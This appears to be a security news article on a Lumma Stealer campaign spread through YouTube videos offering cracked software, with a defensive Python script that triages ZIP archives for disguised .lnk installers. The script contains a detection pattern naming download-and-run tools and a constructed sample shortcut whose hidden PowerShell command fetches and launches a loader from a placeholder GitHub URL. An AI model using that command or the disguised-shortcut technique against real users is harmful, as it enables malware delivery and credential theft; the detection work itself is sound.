Threat actors are using YouTube videos that promote cracked software to distribute an information stealer known as Lumma. The videos pose as installation guides for pirated applications and carry malicious download links in their descriptions, shortened with services such as TinyURL and Cuttly so the final host is not visible before clicking. The tactic itself is not new: similar attack chains have been observed before, delivering stealers, clipboard hijackers (clippers), and cryptocurrency miners.

In the latest campaign documented by Fortinet, users searching YouTube for cracked versions of video editing tools such as Vegas Pro are directed to a link in the video's description, which leads to a fake installer hosted on MediaFire. The download is a ZIP archive whose only "installer" is a Windows shortcut (LNK) file disguised as a setup file; there is no legitimate installer inside. When opened, the LNK retrieves a .NET loader from a GitHub repository, and the loader performs a series of anti-virtual-machine and anti-debugging checks before loading the Lumma Stealer payload. Staging the files on widely used services such as MediaFire and GitHub gives the download chain ordinary-looking domains, so defenders should not rely on domain reputation alone here.
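The chain above hinges on a shortcut file standing in for an installer. An added example that is not Fortinet's or the campaign's code: the script below triages a downloaded ZIP for .lnk entries, parses the Shell Link header and StringData fields defined in MS-SHLLINK to recover the shortcut's target and command-line arguments, and flags the two tells the article describes, an installer-like file name and arguments that download and run something from GitHub. The sample shortcut and archive are constructed inline and are not real artefacts; the GitHub raw URL, the PowerShell argument string and the `example/repo` path are placeholders assumed for illustration.

```python
"""Triage a ZIP download for a Windows shortcut (.lnk) posing as an installer.

Added example, not code from the article or Fortinet. The .lnk parser follows the
public Shell Link format (MS-SHLLINK): 76-byte header, optional LinkTargetIDList and
LinkInfo, then StringData. The sample .lnk and ZIP below are constructed, not real.
"""
import io
import re
import struct
import zipfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

# Patterns that, in a shortcut's target or arguments, indicate a download-and-execute stub.
# The GitHub host patterns are assumptions about where a loader might be fetched from.
SUSPICIOUS_ARGS = re.compile(
    r"(powershell|pwsh|mshta|rundll32|cmd(\.exe)?\s*/c|curl|bitsadmin|certutil|"
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\biex\b|"
    r"raw\.githubusercontent\.com|github\.com/[^/\s]+/[^/\s]+/releases/download)",
    re.IGNORECASE,
)
INSTALLER_NAME = re.compile(r"(setup|install|crack|patch|keygen|activator)", re.IGNORECASE)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (name, relative_path, working_dir, arguments, icon_location)."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        # ANSI strings use the system code page; cp1252 is assumed here.
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
    return fields


def triage_zip(zip_bytes: bytes) -> list:
    """Report every .lnk inside the archive with the reasons it looks like a disguised installer."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            reasons = []
            if INSTALLER_NAME.search(info.filename):
                reasons.append("shortcut named like an installer")
            try:
                fields = parse_lnk(zf.read(info))
            except ValueError:
                fields = {}
                reasons.append("malformed .lnk header")
            target = fields.get("relative_path", "")
            args = fields.get("arguments", "")
            if SUSPICIOUS_ARGS.search(target) or SUSPICIOUS_ARGS.search(args):
                reasons.append("download/execute stub in shortcut target or arguments")
            findings.append({"file": info.filename, "target": target, "arguments": args, "reasons": reasons})
    return findings


def build_lnk(relative_path: str, working_dir: str, arguments: str) -> bytes:
    """Build a minimal Unicode Shell Link with the given StringData (constructed test sample)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<II", flags, 0x20)  # FILE_ATTRIBUTE_ARCHIVE
    header += b"\x00" * 24                                                         # three FILETIMEs
    header += struct.pack("<IIIHHII", 0, 0, 1, 0, 0, 0, 0)   # FileSize, IconIndex, SW_SHOWNORMAL, HotKey, reserved
    id_list = b"\x04\x00\xaa\xbb" + b"\x00\x00"              # one dummy ItemID + terminator, to exercise the skip
    body = struct.pack("<H", len(id_list)) + id_list
    for s in (relative_path, working_dir, arguments):
        encoded = s.encode("utf-16-le")
        body += struct.pack("<H", len(encoded) // 2) + encoded
    return header + body


# Constructed sample: an archive with a decoy text file and a shortcut named like the installer.
SAMPLE_ARGS = ('-NoProfile -WindowStyle Hidden -Command "iwr https://raw.githubusercontent.com/example/repo/main/loader.exe '
               '-OutFile $env:TEMP\\loader.exe; Start-Process $env:TEMP\\loader.exe"')


def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Vegas Pro Setup.lnk",
                    build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"%TEMP%", SAMPLE_ARGS))
        zf.writestr("readme.txt", "Run Setup to install")
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_zip(build_sample_zip()):
        print(f["file"], "->", f["target"], f["reasons"])
```

Only the StringData section is parsed; a real triage would also walk the ExtraData blocks (for example EnvironmentVariableDataBlock, which can carry the true target when the relative path is a decoy), but the header and StringData alone already expose the two signals the campaign relies on.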

Lumma Stealer, which has been sold on underground forums since late 2022, harvests sensitive data from infected hosts and exfiltrates it to a server controlled by the threat actor. The delivery method resembles the stream-jacking attacks on YouTube reported by Bitdefender, in which cybercriminals take over high-profile channels through phishing and use them to spread RedLine Stealer, which steals login credentials and session cookies.

Separately, a phishing campaign has been discovered that delivers an obfuscated JavaScript file which drops the AsyncRAT remote access trojan. Its targets are carefully selected, and some of them manage key infrastructure in the United States.